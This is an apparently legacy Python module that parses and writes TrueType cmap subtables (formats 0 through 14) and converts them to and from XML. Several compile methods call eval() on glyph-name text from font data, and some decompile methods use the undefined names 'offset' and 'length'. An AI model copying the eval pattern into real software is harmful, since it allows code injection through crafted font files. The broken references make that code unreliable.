def _writeCodes(self, codes, writer):
isUnicode = self.isUnicode()
for code, name in codes:
writer.simpletag("map", code=hex(code), name=name)
if isUnicode:
writer.comment(Unicode[code])
writer.newline()
def __lt__(self, other):
if not isinstance(other, CmapSubtable):
return NotImplemented
# implemented so that list.sort() sorts according to the spec.
selfTuple = (
getattr(self, "platformID", None),
getattr(self, "platEncID", None),
getattr(self, "language", None),
self.__dict__)
otherTuple = (
getattr(other, "platformID", None),
getattr(other, "platEncID", None),
getattr(other, "language", None),
other.__dict__)
return selfTuple < otherTuple
class cmap_format_0(CmapSubtable):
def decompile(self, data, ttFont):
# we usually get here indirectly from the subtable __getattr__ function, in which case both args must be None.
# If not, someone is calling the subtable decompile() directly, and must provide both args.
if data is not None and ttFont is not None:
self.decompileHeader(data[offset:offset+int(length)], ttFont)
else:
assert (data is None and ttFont is None), "Need both data and ttFont arguments"
data = self.data # decompileHeader assigns the data after the header to self.data
assert 262 == self.length, "Format 0 cmap subtable not 262 bytes"
glyphIdArray = array.array("B")
glyphIdArray.fromstring(self.data)
self.cmap = cmap = {}
lenArray = len(glyphIdArray)
charCodes = list(range(lenArray))
names = map(self.ttFont.getGlyphName, glyphIdArray)
list(map(operator.setitem, [cmap]*lenArray, charCodes, names))
def compile(self, ttFont):
if self.data:
return struct.pack(">HHH", 0, 262, self.language) + self.data
charCodeList = sorted(self.cmap.items())
charCodes = [entry[0] for entry in charCodeList]
valueList = [entry[1] for entry in charCodeList]
assert charCodes == list(range(256))
valueList = map(ttFont.getGlyphID, valueList)
glyphIdArray = array.array("B", valueList)
data = struct.pack(">HHH", 0, 262, self.language) + glyphIdArray.tostring()
assert len(data) == 262
return data
def fromXML(self, name, attrs, content, ttFont):
self.language = safeEval(attrs["language"])
if not hasattr(self, "cmap"):
self.cmap = {}
cmap = self.cmap
for element in content:
if not isinstance(element, tuple):
continue
name, attrs, content = element
if name != "map":
continue
cmap[safeEval(attrs["code"])] = attrs["name"]
subHeaderFormat = ">HHhH"
class SubHeader(object):
def __init__(self):
self.firstCode = None
self.entryCount = None
self.idDelta = None
self.idRangeOffset = None
self.glyphIndexArray = []
class cmap_format_2(CmapSubtable):
def setIDDelta(self, subHeader):
subHeader.idDelta = 0
# find the minGI which is not zero.
minGI = subHeader.glyphIndexArray[0]
for gid in subHeader.glyphIndexArray:
if (gid != 0) and (gid < minGI):
minGI = gid
# The lowest gid in glyphIndexArray, after subtracting idDelta, must be 1.
# idDelta is a short, and must be between -32K and 32K. minGI can be between 1 and 64K.
# We would like to pick an idDelta such that the first glyphArray GID is 1,
# so that we are more likely to be able to combine glypharray GID subranges.
# This means that we have a problem when minGI is > 32K
# Since the final gi is reconstructed from the glyphArray GID by:
# (short)finalGID = (gid + idDelta) % 0x10000),
# we can get from a glypharray GID of 1 to a final GID of 65K by subtracting 2, and casting the
# negative number to an unsigned short.
if (minGI > 1):
if minGI > 0x7FFF:
subHeader.idDelta = -(0x10000 - minGI) -1
else:
subHeader.idDelta = minGI -1
idDelta = subHeader.idDelta
for i in range(subHeader.entryCount):
gid = subHeader.glyphIndexArray[i]
if gid > 0:
subHeader.glyphIndexArray[i] = gid - idDelta
def decompile(self, data, ttFont):
# we usually get here indirectly from the subtable __getattr__ function, in which case both args must be None.
# If not, someone is calling the subtable decompile() directly, and must provide both args.
if data is not None and ttFont is not None:
self.decompileHeader(data[offset:offset+int(length)], ttFont)
else:
assert (data is None and ttFont is None), "Need both data and ttFont arguments"
data = self.data # decompileHeader assigns the data after the header to self.data
subHeaderKeys = []
maxSubHeaderindex = 0
# get the key array, and determine the number of subHeaders.
allKeys = array.array("H")
allKeys.fromstring(data[:512])
data = data[512:]
if sys.byteorder != "big":
allKeys.byteswap()
subHeaderKeys = [ key//8 for key in allKeys]
maxSubHeaderindex = max(subHeaderKeys)
#Load subHeaders
subHeaderList = []
pos = 0
for i in range(maxSubHeaderindex + 1):
subHeader = SubHeader()
(subHeader.firstCode, subHeader.entryCount, subHeader.idDelta, \
subHeader.idRangeOffset) = struct.unpack(subHeaderFormat, data[pos:pos + 8])
pos += 8
giDataPos = pos + subHeader.idRangeOffset-2
giList = array.array("H")
giList.fromstring(data[giDataPos:giDataPos + subHeader.entryCount*2])
if sys.byteorder != "big":
giList.byteswap()
subHeader.glyphIndexArray = giList
subHeaderList.append(subHeader)
# How this gets processed.
# Charcodes may be one or two bytes.
# The first byte of a charcode is mapped through the subHeaderKeys, to select
# a subHeader. For any subheader but 0, the next byte is then mapped through the
# selected subheader. If subheader Index 0 is selected, then the byte itself is
# mapped through the subheader, and there is no second byte.
# Then assume that the subsequent byte is the first byte of the next charcode,and repeat.
#
# Each subheader references a range in the glyphIndexArray whose length is entryCount.
# The range in glyphIndexArray referenced by a sunheader may overlap with the range in glyphIndexArray
# referenced by another subheader.
# The only subheader that will be referenced by more than one first-byte value is the subheader
# that maps the entire range of glyphID values to glyphIndex 0, e.g notdef:
# {firstChar 0, EntryCount 0,idDelta 0,idRangeOffset xx}
# A byte being mapped though a subheader is treated as in index into a mapping of array index to font glyphIndex.
# A subheader specifies a subrange within (0...256) by the
# firstChar and EntryCount values. If the byte value is outside the subrange, then the glyphIndex is zero
# (e.g. glyph not in font).
# If the byte index is in the subrange, then an offset index is calculated as (byteIndex - firstChar).
# The index to glyphIndex mapping is a subrange of the glyphIndexArray. You find the start of the subrange by
# counting idRangeOffset bytes from the idRangeOffset word. The first value in this subrange is the
# glyphIndex for the index firstChar. The offset index should then be used in this array to get the glyphIndex.
# Example for Logocut-Medium
# first byte of charcode = 129; selects subheader 1.
# subheader 1 = {firstChar 64, EntryCount 108,idDelta 42,idRangeOffset 0252}
# second byte of charCode = 66
# the index offset = 66-64 = 2.
# The subrange of the glyphIndexArray starting at 0x0252 bytes from the idRangeOffset word is:
# [glyphIndexArray index], [subrange array index] = glyphIndex
# [256], [0]=1 from charcode [129, 64]
# [257], [1]=2 from charcode [129, 65]
# [258], [2]=3 from charcode [129, 66]
# [259], [3]=4 from charcode [129, 67]
# So, the glyphIndex = 3 from the array. Then if idDelta is not zero and the glyph ID is not zero,
# add it to the glyphID to get the final glyphIndex
# value. In this case the final glyph index = 3+ 42 -> 45 for the final glyphIndex. Whew!
self.data = b""
self.cmap = cmap = {}
notdefGI = 0
for firstByte in range(256):
subHeadindex = subHeaderKeys[firstByte]
subHeader = subHeaderList[subHeadindex]
if subHeadindex == 0:
if (firstByte < subHeader.firstCode) or (firstByte >= subHeader.firstCode + subHeader.entryCount):
continue # gi is notdef.
else:
charCode = firstByte
offsetIndex = firstByte - subHeader.firstCode
gi = subHeader.glyphIndexArray[offsetIndex]
if gi != 0:
gi = (gi + subHeader.idDelta) % 0x10000
else:
continue # gi is notdef.
cmap[charCode] = gi
else:
if subHeader.entryCount:
charCodeOffset = firstByte * 256 + subHeader.firstCode
for offsetIndex in range(subHeader.entryCount):
charCode = charCodeOffset + offsetIndex
gi = subHeader.glyphIndexArray[offsetIndex]
if gi != 0:
gi = (gi + subHeader.idDelta) % 0x10000
else:
continue
cmap[charCode] = gi
# If not subHeader.entryCount, then all char codes with this first byte are
# mapped to .notdef. We can skip this subtable, and leave the glyphs un-encoded, which is the
# same as mapping it to .notdef.
# cmap values are GID's.
glyphOrder = self.ttFont.getGlyphOrder()
gids = list(cmap.values())
charCodes = list(cmap.keys())
lenCmap = len(gids)
try:
names = list(map(operator.getitem, [glyphOrder]*lenCmap, gids ))
except IndexError:
getGlyphName = self.ttFont.getGlyphName
names = list(map(getGlyphName, gids ))
list(map(operator.setitem, [cmap]*lenCmap, charCodes, names))
def compile(self, ttFont):
if self.data:
return struct.pack(">HHH", self.format, self.length, self.language) + self.data
kEmptyTwoCharCodeRange = -1
notdefGI = 0
items = sorted(self.cmap.items())
charCodes = [item[0] for item in items]
names = [item[1] for item in items]
nameMap = ttFont.getReverseGlyphMap()
lenCharCodes = len(charCodes)
try:
gids = list(map(operator.getitem, [nameMap]*lenCharCodes, names))
except KeyError:
nameMap = ttFont.getReverseGlyphMap(rebuild=True)
try:
gids = list(map(operator.getitem, [nameMap]*lenCharCodes, names))
except KeyError:
# allow virtual GIDs in format 2 tables
gids = []
for name in names:
try:
gid = nameMap[name]
except KeyError:
try:
if (name[:3] == 'gid'):
gid = eval(name[3:])
else:
gid = ttFont.getGlyphID(name)
except:
raise KeyError(name)
gids.append(gid)
# Process the (char code to gid) item list in char code order.
# By definition, all one byte char codes map to subheader 0.
# For all the two byte char codes, we assume that the first byte maps maps to the empty subhead (with an entry count of 0,
# which defines all char codes in its range to map to notdef) unless proven otherwise.
# Note that since the char code items are processed in char code order, all the char codes with the
# same first byte are in sequential order.
subHeaderKeys = [ kEmptyTwoCharCodeRange for x in range(256)] # list of indices into subHeaderList.
subHeaderList = []
# We force this subheader entry 0 to exist in the subHeaderList in the case where some one comes up
# with a cmap where all the one byte char codes map to notdef,
# with the result that the subhead 0 would not get created just by processing the item list.
charCode = charCodes[0]
if charCode > 255:
subHeader = SubHeader()
subHeader.firstCode = 0
subHeader.entryCount = 0
subHeader.idDelta = 0
subHeader.idRangeOffset = 0
subHeaderList.append(subHeader)
lastFirstByte = -1
items = zip(charCodes, gids)
for charCode, gid in items:
if gid == 0:
continue
firstbyte = charCode >> 8
secondByte = charCode & 0x00FF
if firstbyte != lastFirstByte: # Need to update the current subhead, and start a new one.
if lastFirstByte > -1:
# fix GI's and iDelta of current subheader.
self.setIDDelta(subHeader)
# If it was sunheader 0 for one-byte charCodes, then we need to set the subHeaderKeys value to zero
# for the indices matching the char codes.
if lastFirstByte == 0:
for index in range(subHeader.entryCount):
charCode = subHeader.firstCode + index
subHeaderKeys[charCode] = 0
assert (subHeader.entryCount == len(subHeader.glyphIndexArray)), "Error - subhead entry count does not match len of glyphID subrange."
# init new subheader
subHeader = SubHeader()
subHeader.firstCode = secondByte
subHeader.entryCount = 1
subHeader.glyphIndexArray.append(gid)
subHeaderList.append(subHeader)
subHeaderKeys[firstbyte] = len(subHeaderList) -1
lastFirstByte = firstbyte
else:
# need to fill in with notdefs all the code points between the last charCode and the current charCode.
codeDiff = secondByte - (subHeader.firstCode + subHeader.entryCount)
for i in range(codeDiff):
subHeader.glyphIndexArray.append(notdefGI)
subHeader.glyphIndexArray.append(gid)
subHeader.entryCount = subHeader.entryCount + codeDiff + 1
# fix GI's and iDelta of last subheader that we we added to the subheader array.
self.setIDDelta(subHeader)
# Now we add a final subheader for the subHeaderKeys which maps to empty two byte charcode ranges.
subHeader = SubHeader()
subHeader.firstCode = 0
subHeader.entryCount = 0
subHeader.idDelta = 0
subHeader.idRangeOffset = 2
subHeaderList.append(subHeader)
emptySubheadIndex = len(subHeaderList) - 1
for index in range(256):
if subHeaderKeys[index] == kEmptyTwoCharCodeRange:
subHeaderKeys[index] = emptySubheadIndex
# Since this is the last subheader, the GlyphIndex Array starts two bytes after the start of the
# idRangeOffset word of this subHeader. We can safely point to the first entry in the GlyphIndexArray,
# since the first subrange of the GlyphIndexArray is for subHeader 0, which always starts with
# charcode 0 and GID 0.
idRangeOffset = (len(subHeaderList)-1)*8 + 2 # offset to beginning of glyphIDArray from first subheader idRangeOffset.
subheadRangeLen = len(subHeaderList) -1 # skip last special empty-set subheader; we've already hardocodes its idRangeOffset to 2.
for index in range(subheadRangeLen):
subHeader = subHeaderList[index]
subHeader.idRangeOffset = 0
for j in range(index):
prevSubhead = subHeaderList[j]
if prevSubhead.glyphIndexArray == subHeader.glyphIndexArray: # use the glyphIndexArray subarray
subHeader.idRangeOffset = prevSubhead.idRangeOffset - (index-j)*8
subHeader.glyphIndexArray = []
break
if subHeader.idRangeOffset == 0: # didn't find one.
subHeader.idRangeOffset = idRangeOffset
idRangeOffset = (idRangeOffset - 8) + subHeader.entryCount*2 # one less subheader, one more subArray.
else:
idRangeOffset = idRangeOffset - 8 # one less subheader
# Now we can write out the data!
length = 6 + 512 + 8*len(subHeaderList) # header, 256 subHeaderKeys, and subheader array.
for subhead in subHeaderList[:-1]:
length = length + len(subhead.glyphIndexArray)*2 # We can't use subhead.entryCount, as some of the subhead may share subArrays.
dataList = [struct.pack(">HHH", 2, length, self.language)]
for index in subHeaderKeys:
dataList.append(struct.pack(">H", index*8))
for subhead in subHeaderList:
dataList.append(struct.pack(subHeaderFormat, subhead.firstCode, subhead.entryCount, subhead.idDelta, subhead.idRangeOffset))
for subhead in subHeaderList[:-1]:
for gi in subhead.glyphIndexArray:
dataList.append(struct.pack(">H", gi))
data = bytesjoin(dataList)
assert (len(data) == length), "Error: cmap format 2 is not same length as calculated! actual: " + str(len(data))+ " calc : " + str(length)
return data
def fromXML(self, name, attrs, content, ttFont):
self.language = safeEval(attrs["language"])
if not hasattr(self, "cmap"):
self.cmap = {}
cmap = self.cmap
for element in content:
if not isinstance(element, tuple):
continue
name, attrs, content = element
if name != "map":
continue
cmap[safeEval(attrs["code"])] = attrs["name"]
cmap_format_4_format = ">7H"
#uint16 endCode[segCount] # Ending character code for each segment, last = 0xFFFF.
#uint16 reservedPad # This value should be zero
#uint16 startCode[segCount] # Starting character code for each segment
#uint16 idDelta[segCount] # Delta for all character codes in segment
#uint16 idRangeOffset[segCount] # Offset in bytes to glyph indexArray, or 0
#uint16 glyphIndexArray[variable] # Glyph index array
def splitRange(startCode, endCode, cmap):
# Try to split a range of character codes into subranges with consecutive
# glyph IDs in such a way that the cmap4 subtable can be stored "most"
# efficiently. I can't prove I've got the optimal solution, but it seems
# to do well with the fonts I tested: none became bigger, many became smaller.
if startCode == endCode:
return [], [endCode]
lastID = cmap[startCode]
lastCode = startCode
inOrder = None
orderedBegin = None
subRanges = []
# Gather subranges in which the glyph IDs are consecutive.
for code in range(startCode + 1, endCode + 1):
glyphID = cmap[code]
if glyphID - 1 == lastID:
if inOrder is None or not inOrder:
inOrder = 1
orderedBegin = lastCode
else:
if inOrder:
inOrder = 0
subRanges.append((orderedBegin, lastCode))
orderedBegin = None
lastID = glyphID
lastCode = code
if inOrder:
subRanges.append((orderedBegin, lastCode))
assert lastCode == endCode
# Now filter out those new subranges that would only make the data bigger.
# A new segment cost 8 bytes, not using a new segment costs 2 bytes per
# character.
newRanges = []
for b, e in subRanges:
if b == startCode and e == endCode:
break # the whole range, we're fine
if b == startCode or e == endCode:
threshold = 4 # split costs one more segment
else:
threshold = 8 # split costs two more segments
if (e - b + 1) > threshold:
newRanges.append((b, e))
subRanges = newRanges
if not subRanges:
return [], [endCode]
if subRanges[0][0] != startCode:
subRanges.insert(0, (startCode, subRanges[0][0] - 1))
if subRanges[-1][1] != endCode:
subRanges.append((subRanges[-1][1] + 1, endCode))
# Fill the "holes" in the segments list -- those are the segments in which
# the glyph IDs are _not_ consecutive.
i = 1
while i < len(subRanges):
if subRanges[i-1][1] + 1 != subRanges[i][0]:
subRanges.insert(i, (subRanges[i-1][1] + 1, subRanges[i][0] - 1))
i = i + 1
i = i + 1
# Transform the ranges into startCode/endCode lists.
start = []
end = []
for b, e in subRanges:
start.append(b)
end.append(e)
start.pop(0)
assert len(start) + 1 == len(end)
return start, end
class cmap_format_4(CmapSubtable):
def decompile(self, data, ttFont):
# we usually get here indirectly from the subtable __getattr__ function, in which case both args must be None.
# If not, someone is calling the subtable decompile() directly, and must provide both args.
if data is not None and ttFont is not None:
self.decompileHeader(self.data[offset:offset+int(length)], ttFont)
else:
assert (data is None and ttFont is None), "Need both data and ttFont arguments"
data = self.data # decompileHeader assigns the data after the header to self.data
(segCountX2, searchRange, entrySelector, rangeShift) = \
struct.unpack(">4H", data[:8])
data = data[8:]
segCount = segCountX2 // 2
allCodes = array.array("H")
allCodes.fromstring(data)
self.data = data = None
if sys.byteorder != "big":
allCodes.byteswap()
# divide the data
endCode = allCodes[:segCount]
allCodes = allCodes[segCount+1:] # the +1 is skipping the reservedPad field
startCode = allCodes[:segCount]
allCodes = allCodes[segCount:]
idDelta = allCodes[:segCount]
allCodes = allCodes[segCount:]
idRangeOffset = allCodes[:segCount]
glyphIndexArray = allCodes[segCount:]
lenGIArray = len(glyphIndexArray)
# build 2-byte character mapping
charCodes = []
gids = []
for i in range(len(startCode) - 1): # don't do 0xffff!
start = startCode[i]
delta = idDelta[i]
rangeOffset = idRangeOffset[i]
# *someone* needs to get killed.
partial = rangeOffset // 2 - start + i - len(idRangeOffset)
rangeCharCodes = list(range(startCode[i], endCode[i] + 1))
charCodes.extend(rangeCharCodes)
if rangeOffset == 0:
gids.extend([(charCode + delta) & 0xFFFF for charCode in rangeCharCodes])
else:
for charCode in rangeCharCodes:
index = charCode + partial
assert (index < lenGIArray), "In format 4 cmap, range (%d), the calculated index (%d) into the glyph index array is not less than the length of the array (%d) !" % (i, index, lenGIArray)
if glyphIndexArray[index] != 0: # if not missing glyph
glyphID = glyphIndexArray[index] + delta
else:
glyphID = 0 # missing glyph
gids.append(glyphID & 0xFFFF)
self.cmap = cmap = {}
lenCmap = len(gids)
glyphOrder = self.ttFont.getGlyphOrder()
try:
names = list(map(operator.getitem, [glyphOrder]*lenCmap, gids ))
except IndexError:
getGlyphName = self.ttFont.getGlyphName
names = list(map(getGlyphName, gids ))
list(map(operator.setitem, [cmap]*lenCmap, charCodes, names))
def compile(self, ttFont):
if self.data:
return struct.pack(">HHH", self.format, self.length, self.language) + self.data
charCodes = list(self.cmap.keys())
lenCharCodes = len(charCodes)
if lenCharCodes == 0:
startCode = [0xffff]
endCode = [0xffff]
else:
charCodes.sort()
names = list(map(operator.getitem, [self.cmap]*lenCharCodes, charCodes))
nameMap = ttFont.getReverseGlyphMap()
try:
gids = list(map(operator.getitem, [nameMap]*lenCharCodes, names))
except KeyError:
nameMap = ttFont.getReverseGlyphMap(rebuild=True)
try:
gids = list(map(operator.getitem, [nameMap]*lenCharCodes, names))
except KeyError:
# allow virtual GIDs in format 4 tables
gids = []
for name in names:
try:
gid = nameMap[name]
except KeyError:
try:
if (name[:3] == 'gid'):
gid = eval(name[3:])
else:
gid = ttFont.getGlyphID(name)
except:
raise KeyError(name)
gids.append(gid)
cmap = {} # code:glyphID mapping
list(map(operator.setitem, [cmap]*len(charCodes), charCodes, gids))
# Build startCode and endCode lists.
# Split the char codes in ranges of consecutive char codes, then split
# each range in more ranges of consecutive/not consecutive glyph IDs.
# See splitRange().
lastCode = charCodes[0]
endCode = []
startCode = [lastCode]
for charCode in charCodes[1:]: # skip the first code, it's the first start code
if charCode == lastCode + 1:
lastCode = charCode
continue
start, end = splitRange(startCode[-1], lastCode, cmap)
startCode.extend(start)
endCode.extend(end)
startCode.append(charCode)
lastCode = charCode
endCode.append(lastCode)
startCode.append(0xffff)
endCode.append(0xffff)
# build up rest of cruft
idDelta = []
idRangeOffset = []
glyphIndexArray = []
for i in range(len(endCode)-1): # skip the closing codes (0xffff)
indices = []
for charCode in range(startCode[i], endCode[i] + 1):
indices.append(cmap[charCode])
if (indices == list(range(indices[0], indices[0] + len(indices)))):
idDelta.append((indices[0] - startCode[i]) % 0x10000)
idRangeOffset.append(0)
else:
# someone *definitely* needs to get killed.
idDelta.append(0)
idRangeOffset.append(2 * (len(endCode) + len(glyphIndexArray) - i))
glyphIndexArray.extend(indices)
idDelta.append(1) # 0xffff + 1 == (tadaa!) 0. So this end code maps to .notdef
idRangeOffset.append(0)
# Insane.
segCount = len(endCode)
segCountX2 = segCount * 2
searchRange, entrySelector, rangeShift = getSearchRange(segCount, 2)
charCodeArray = array.array("H", endCode + [0] + startCode)
idDeltaArray = array.array("H", idDelta)
restArray = array.array("H", idRangeOffset + glyphIndexArray)
if sys.byteorder != "big":
charCodeArray.byteswap()
idDeltaArray.byteswap()
restArray.byteswap()
data = charCodeArray.tostring() + idDeltaArray.tostring() + restArray.tostring()
length = struct.calcsize(cmap_format_4_format) + len(data)
header = struct.pack(cmap_format_4_format, self.format, length, self.language,
segCountX2, searchRange, entrySelector, rangeShift)
return header + data
def fromXML(self, name, attrs, content, ttFont):
self.language = safeEval(attrs["language"])
if not hasattr(self, "cmap"):
self.cmap = {}
cmap = self.cmap
for element in content:
if not isinstance(element, tuple):
continue
nameMap, attrsMap, dummyContent = element
if nameMap != "map":
assert 0, "Unrecognized keyword in cmap subtable"
cmap[safeEval(attrsMap["code"])] = attrsMap["name"]
class cmap_format_6(CmapSubtable):
def decompile(self, data, ttFont):
# we usually get here indirectly from the subtable __getattr__ function, in which case both args must be None.
# If not, someone is calling the subtable decompile() directly, and must provide both args.
if data is not None and ttFont is not None:
self.decompileHeader(data[offset:offset+int(length)], ttFont)
else:
assert (data is None and ttFont is None), "Need both data and ttFont arguments"
data = self.data # decompileHeader assigns the data after the header to self.data
firstCode, entryCount = struct.unpack(">HH", data[:4])
firstCode = int(firstCode)
data = data[4:]
#assert len(data) == 2 * entryCount # XXX not true in Apple's Helvetica!!!
glyphIndexArray = array.array("H")
glyphIndexArray.fromstring(data[:2 * int(entryCount)])
if sys.byteorder != "big":
glyphIndexArray.byteswap()
self.data = data = None
self.cmap = cmap = {}
lenArray = len(glyphIndexArray)
charCodes = list(range(firstCode, firstCode + lenArray))
glyphOrder = self.ttFont.getGlyphOrder()
try:
names = list(map(operator.getitem, [glyphOrder]*lenArray, glyphIndexArray ))
except IndexError:
getGlyphName = self.ttFont.getGlyphName
names = list(map(getGlyphName, glyphIndexArray ))
list(map(operator.setitem, [cmap]*lenArray, charCodes, names))
def compile(self, ttFont):
if self.data:
return struct.pack(">HHH", self.format, self.length, self.language) + self.data
cmap = self.cmap
codes = list(cmap.keys())
if codes: # yes, there are empty cmap tables.
codes = list(range(codes[0], codes[-1] + 1))
firstCode = codes[0]
valueList = [cmap.get(code, ".notdef") for code in codes]
valueList = map(ttFont.getGlyphID, valueList)
glyphIndexArray = array.array("H", valueList)
if sys.byteorder != "big":
glyphIndexArray.byteswap()
data = glyphIndexArray.tostring()
else:
data = b""
firstCode = 0
header = struct.pack(">HHHHH",
6, len(data) + 10, self.language, firstCode, len(codes))
return header + data
def fromXML(self, name, attrs, content, ttFont):
self.language = safeEval(attrs["language"])
if not hasattr(self, "cmap"):
self.cmap = {}
cmap = self.cmap
for element in content:
if not isinstance(element, tuple):
continue
name, attrs, content = element
if name != "map":
continue
cmap[safeEval(attrs["code"])] = attrs["name"]
class cmap_format_12_or_13(CmapSubtable):
def __init__(self, format):
self.format = format
self.reserved = 0
self.data = None
self.ttFont = None
def decompileHeader(self, data, ttFont):
format, reserved, length, language, nGroups = struct.unpack(">HHLLL", data[:16])
assert len(data) == (16 + nGroups*12) == (length), "corrupt cmap table format %d (data length: %d, header length: %d)" % (format, len(data), length)
self.format = format
self.reserved = reserved
self.length = length
self.language = language
self.nGroups = nGroups
self.data = data[16:]
self.ttFont = ttFont
def decompile(self, data, ttFont):
# we usually get here indirectly from the subtable __getattr__ function, in which case both args must be None.
# If not, someone is calling the subtable decompile() directly, and must provide both args.
if data is not None and ttFont is not None:
self.decompileHeader(data[offset:offset+int(length)], ttFont)
else:
assert (data is None and ttFont is None), "Need both data and ttFont arguments"
data = self.data # decompileHeader assigns the data after the header to self.data
charCodes = []
gids = []
pos = 0
for i in range(self.nGroups):
startCharCode, endCharCode, glyphID = struct.unpack(">LLL",data[pos:pos+12] )
pos += 12
lenGroup = 1 + endCharCode - startCharCode
charCodes.extend(list(range(startCharCode, endCharCode +1)))
gids.extend(self._computeGIDs(glyphID, lenGroup))
self.data = data = None
self.cmap = cmap = {}
lenCmap = len(gids)
glyphOrder = self.ttFont.getGlyphOrder()
try:
names = list(map(operator.getitem, [glyphOrder]*lenCmap, gids ))
except IndexError:
getGlyphName = self.ttFont.getGlyphName
names = list(map(getGlyphName, gids ))
list(map(operator.setitem, [cmap]*lenCmap, charCodes, names))
def compile(self, ttFont):
if self.data:
return struct.pack(">HHLLL", self.format, self.reserved, self.length, self.language, self.nGroups) + self.data
charCodes = list(self.cmap.keys())
lenCharCodes = len(charCodes)
names = list(self.cmap.values())
nameMap = ttFont.getReverseGlyphMap()
try:
gids = list(map(operator.getitem, [nameMap]*lenCharCodes, names))
except KeyError:
nameMap = ttFont.getReverseGlyphMap(rebuild=True)
try:
gids = list(map(operator.getitem, [nameMap]*lenCharCodes, names))
except KeyError:
# allow virtual GIDs in format 12 tables
gids = []
for name in names:
try:
gid = nameMap[name]
except KeyError:
try:
if (name[:3] == 'gid'):
gid = eval(name[3:])
else:
gid = ttFont.getGlyphID(name)
except:
raise KeyError(name)
gids.append(gid)
cmap = {} # code:glyphID mapping
list(map(operator.setitem, [cmap]*len(charCodes), charCodes, gids))
charCodes.sort()
index = 0
startCharCode = charCodes[0]
startGlyphID = cmap[startCharCode]
lastGlyphID = startGlyphID - self._format_step
lastCharCode = startCharCode - 1
nGroups = 0
dataList = []
maxIndex = len(charCodes)
for index in range(maxIndex):
charCode = charCodes[index]
glyphID = cmap[charCode]
if not self._IsInSameRun(glyphID, lastGlyphID, charCode, lastCharCode):
dataList.append(struct.pack(">LLL", startCharCode, lastCharCode, startGlyphID))
startCharCode = charCode
startGlyphID = glyphID
nGroups = nGroups + 1
lastGlyphID = glyphID
lastCharCode = charCode
dataList.append(struct.pack(">LLL", startCharCode, lastCharCode, startGlyphID))
nGroups = nGroups + 1
data = bytesjoin(dataList)
lengthSubtable = len(data) +16
assert len(data) == (nGroups*12) == (lengthSubtable-16)
return struct.pack(">HHLLL", self.format, self.reserved , lengthSubtable, self.language, nGroups) + data
def toXML(self, writer, ttFont):
writer.begintag(self.__class__.__name__, [
("platformID", self.platformID),
("platEncID", self.platEncID),
("format", self.format),
("reserved", self.reserved),
("length", self.length),
("language", self.language),
("nGroups", self.nGroups),
])
writer.newline()
codes = sorted(self.cmap.items())
self._writeCodes(codes, writer)
writer.endtag(self.__class__.__name__)
writer.newline()
def fromXML(self, name, attrs, content, ttFont):
self.format = safeEval(attrs["format"])
self.reserved = safeEval(attrs["reserved"])
self.length = safeEval(attrs["length"])
self.language = safeEval(attrs["language"])
self.nGroups = safeEval(attrs["nGroups"])
if not hasattr(self, "cmap"):
self.cmap = {}
cmap = self.cmap
for element in content:
if not isinstance(element, tuple):
continue
name, attrs, content = element
if name != "map":
continue
cmap[safeEval(attrs["code"])] = attrs["name"]
class cmap_format_12(cmap_format_12_or_13):
def __init__(self, format):
cmap_format_12_or_13.__init__(self, format)
self._format_step = 1
def _computeGIDs(self, startingGlyph, numberOfGlyphs):
return list(range(startingGlyph, startingGlyph + numberOfGlyphs))
def _IsInSameRun(self, glyphID, lastGlyphID, charCode, lastCharCode):
return (glyphID == 1 + lastGlyphID) and (charCode == 1 + lastCharCode)
class cmap_format_13(cmap_format_12_or_13):
def __init__(self, format):
cmap_format_12_or_13.__init__(self, format)
self._format_step = 0
def _computeGIDs(self, startingGlyph, numberOfGlyphs):
return [startingGlyph] * numberOfGlyphs
def _IsInSameRun(self, glyphID, lastGlyphID, charCode, lastCharCode):
return (glyphID == lastGlyphID) and (charCode == 1 + lastCharCode)
def cvtToUVS(threeByteString):
data = b"\0" + threeByteString
val, = struct.unpack(">L", data)
return val
def cvtFromUVS(val):
assert 0 <= val < 0x1000000
fourByteString = struct.pack(">L", val)
return fourByteString[1:]
class cmap_format_14(CmapSubtable):
def decompileHeader(self, data, ttFont):
format, length, numVarSelectorRecords = struct.unpack(">HLL", data[:10])
self.data = data[10:]
self.length = length
self.numVarSelectorRecords = numVarSelectorRecords
self.ttFont = ttFont
self.language = 0xFF # has no language.
def decompile(self, data, ttFont):
if data is not None and ttFont is not None and ttFont.lazy:
self.decompileHeader(data, ttFont)
else:
assert (data is None and ttFont is None), "Need both data and ttFont arguments"
data = self.data
self.cmap = {} # so that clients that expect this to exist in a cmap table won't fail.
uvsDict = {}
recOffset = 0
for n in range(self.numVarSelectorRecords):
uvs, defOVSOffset, nonDefUVSOffset = struct.unpack(">3sLL", data[recOffset:recOffset +11])
recOffset += 11
varUVS = cvtToUVS(uvs)
if defOVSOffset:
startOffset = defOVSOffset - 10
numValues, = struct.unpack(">L", data[startOffset:startOffset+4])
startOffset +=4
for r in range(numValues):
uv, addtlCnt = struct.unpack(">3sB", data[startOffset:startOffset+4])
startOffset += 4
firstBaseUV = cvtToUVS(uv)
cnt = addtlCnt+1
baseUVList = list(range(firstBaseUV, firstBaseUV+cnt))
glyphList = [None]*cnt
localUVList = zip(baseUVList, glyphList)
try:
uvsDict[varUVS].extend(localUVList)
except KeyError:
uvsDict[varUVS] = list(localUVList)
if nonDefUVSOffset:
startOffset = nonDefUVSOffset - 10
numRecs, = struct.unpack(">L", data[startOffset:startOffset+4])
startOffset +=4
localUVList = []
for r in range(numRecs):
uv, gid = struct.unpack(">3sH", data[startOffset:startOffset+5])
startOffset += 5
uv = cvtToUVS(uv)
glyphName = self.ttFont.getGlyphName(gid)
localUVList.append( [uv, glyphName] )
try:
uvsDict[varUVS].extend(localUVList)
except KeyError:
uvsDict[varUVS] = localUVList
self.uvsDict = uvsDict
def toXML(self, writer, ttFont):
writer.begintag(self.__class__.__name__, [
("platformID", self.platformID),
("platEncID", self.platEncID),
("format", self.format),
("length", self.length),
("numVarSelectorRecords", self.numVarSelectorRecords),
])
writer.newline()
uvsDict = self.uvsDict
uvsList = sorted(uvsDict.keys())
for uvs in uvsList:
uvList = uvsDict[uvs]
uvList.sort(key=lambda item: (item[1] is not None, item[0], item[1]))
for uv, gname in uvList:
if gname is None:
gname = "None"
# I use the arg rather than th keyword syntax in order to preserve the attribute order.
writer.simpletag("map", [ ("uvs",hex(uvs)), ("uv",hex(uv)), ("name", gname)] )
writer.newline()
writer.endtag(self.__class__.__name__)
writer.newline()
def fromXML(self, name, attrs, content, ttFont):
self.format = safeEval(attrs["format"])
self.length = safeEval(attrs["length"])
self.numVarSelectorRecords = safeEval(attrs["numVarSelectorRecords"])
